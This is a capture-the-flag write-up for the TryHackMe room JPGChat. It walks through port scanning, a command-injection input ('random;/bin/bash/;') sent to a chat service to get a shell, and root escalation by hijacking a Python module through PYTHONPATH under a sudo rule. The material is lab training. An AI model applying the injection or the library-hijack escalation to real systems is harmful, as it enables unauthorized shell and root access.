Writeup for the room JPGChat (Tryhackme)
Room Link : https://tryhackme.com/room/jpgchat
IP: 10.10.xx.xxx
ENUMERATION:
- RUSTSCAN <br>
rustscan -r 1–65535 -a IP -u 500 -- -A
Interesting port from rustscan: 22, 3000
user.txt
Let’s netcat to the port
nc IP 3000
It states source code is available in github
Welcome to JPChat
the source code of this service can be found at our admin's github
So, enumerating GitHub for JPGChat we get source code to the service running at 3000
random;/bin/bash/;
cat /home/wes/user.txt
root.txt
sudo -l gives:
Matching Defaults entries for wes on ubuntu-xenial:
mail_badpass, env_keep+=PYTHONPATH
User wes may run the following commands on ubuntu-xenial:
(root) SETENV: NOPASSWD: /usr/bin/python3 /opt/development/test_module.py
We can run test_module.py as root, So let’s check the code in the script
from compare import *
print(compare.Str(‘hello’, ‘hello’, ‘hello’))
The scripts imports a library(compare), we need to create a compare.py(/home/wes/compare.py) file to hijack the library to get root privilege:
import os
os.system(“/bin/bash”)
Then run the script as root
sudo PYTHONPATH=/home/wes /usr/bin/python3 /opt/development/test_module.py